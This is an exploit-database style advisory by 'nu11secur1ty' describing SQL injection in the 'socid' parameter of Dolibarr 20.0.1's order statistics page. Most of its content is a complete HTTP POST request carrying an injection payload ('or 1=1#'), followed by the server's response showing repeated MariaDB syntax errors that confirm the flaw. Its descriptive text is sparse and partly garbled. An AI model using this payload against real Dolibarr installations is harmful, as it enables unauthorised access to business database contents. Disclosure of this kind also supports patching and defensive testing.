## Titles: dolibarr 20.0.1 Multiple security token SQLi ## Author: nu11secur1ty ## Date: 10/15/2024 ## Vendor: https://www.dolibarr.org/ ## Software: https://www.dolibarr.org/downloads.php ## Reference: https://portswigger.net/web-security/sql-injection ## Description: The `socid` parameter appears to be vulnerable to SQL injection attacks. The attacker can get sensitive information for the MySQL database from this system when he attacks it online from inside! He can do this, by using a vulnerable security token to access the web application! STATUS: Medium- Vulnerability [+]Exploits: - SQLi Multiple: ``` POST /dolibarr-20.0.1/htdocs/commande/stats/index.php HTTP/1.1 Host: pwnedhost.com Accept-Encoding: gzip, deflate, br Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36 Connection: close Cache-Control: max-age=0 Cookie: DOLSESSID_0297178cd410ba92966a17032c81774a6acb1ec7=hsq658oejrct1401omd4nf2c5q Origin: http://pwnedhost.com Upgrade-Insecure-Requests: 1 Referer: http://pwnedhost.com/dolibarr-20.0.1/htdocs/commande/stats/index.php?leftmenu=orders_suppliers&mode=supplier Content-Type: application/x-www-form-urlencoded Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129" Sec-CH-UA-Platform: Windows Sec-CH-UA-Mobile: ?0 Content-Length: 357 token=ac1770a37880433e4ca36f69be4a8bf2&mode=supplier&socid=-1nu11secur1ty'%20or%201%3d1%23&typent_id=-1&categ_id=-1&userid=1&object_status_multiselect=1&object_status%5B%5D=0&object_status%5B%5D=1&object_status%5B%5D=2&object_status%5B%5D=3&object_status%5B%5D=4&object_status%5B%5D=5&object_status%5B%5D=6%2C7&object_status%5B%5D=9&year=2024&submit=Refresh ``` [+]Response: ```SQLi HTTP/1.1 200 OK Date: Tue, 15 Oct 2024 10:23:43 GMT Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4 X-Powered-By: PHP/8.2.4 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Content-Type-Options: nosniff X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 80974 <!doctype html> <html lang="en"> <head> <meta charset="utf-8"> <meta name="robots" content="noindex,nofollow"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="author ...[SNIP]... </b> mysqli<br> ...[SNIP]... </b> You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'WHERE c.date_commande BETWEEN '2022-01-01 00:00:00' AND '2022-12-31 23:59:59'...' at line 1<b ...[SNIP]... </b> mysqli<br> ...[SNIP]... </b> You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'WHERE c.date_commande BETWEEN '2023-01-01 00:00:00' AND '2023-12-31 23:59:59'...' at line 1<b ...[SNIP]... </b> mysqli<br> ...[SNIP]... </b> You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'WHERE c.date_commande BETWEEN '2024-01-01 00:00:00' AND '2024-12-31 23:59:59'...' at line 1<b ...[SNIP]... </b> mysqli<br> ...[SNIP]... </b> You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ') FROM WHERE c.date_commande BETWEEN '2022-01-01 00:00:00' AND '2022-12-31 2...' at line 1<b ...[SNIP]... </b> mysqli<br> ...[SNIP]... </b> You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ') FROM WHERE c.date_commande BETWEEN '2023-01-01 00:00:00' AND '2023-12-31 2...' at line 1<b ...[SNIP]... </b> mysqli<br> ...[SNIP]... </b> You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ') FROM WHERE c.date_commande BETWEEN '2024-01-01 00:00:00' AND '2024-12-31 2...' at line 1<b ...[SNIP]... </b> mysqli<br> ...[SNIP]... </b> You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ') FROM WHERE c.date_commande BETWEEN '2022-01-01 00:00:00' AND '2022-12-31 2...' at line 1<b ...[SNIP]... </b> mysqli<br> ...[SNIP]... </b> You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ') FROM WHERE c.date_commande BETWEEN '2023-01-01 00:00:00' AND '2023-12-31 2...' at line 1<b ...[SNIP]... </b> mysqli<br> ...[SNIP]... </b> You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ') FROM WHERE c.date_commande BETWEEN '2024-01-01 00:00:00' AND '2024-12-31 2...' at line 1<b ...[SNIP]... </b> mysqli<br> ...[SNIP]... </b> You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ') as total, AVG() as avg FROM WHERE c.entity IN (1) AND c.fk_user_author = 1...' at line 1<b ``` ## Reproduce: [href](https://www.patreon.com/posts/dolibarr-20-0-1-114038337) ## Demo PoC: [href](https://www.nu11secur1ty.com/2024/10/dolibarr-2001-multiple-security-token.html) ## Time spent: 05:27:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>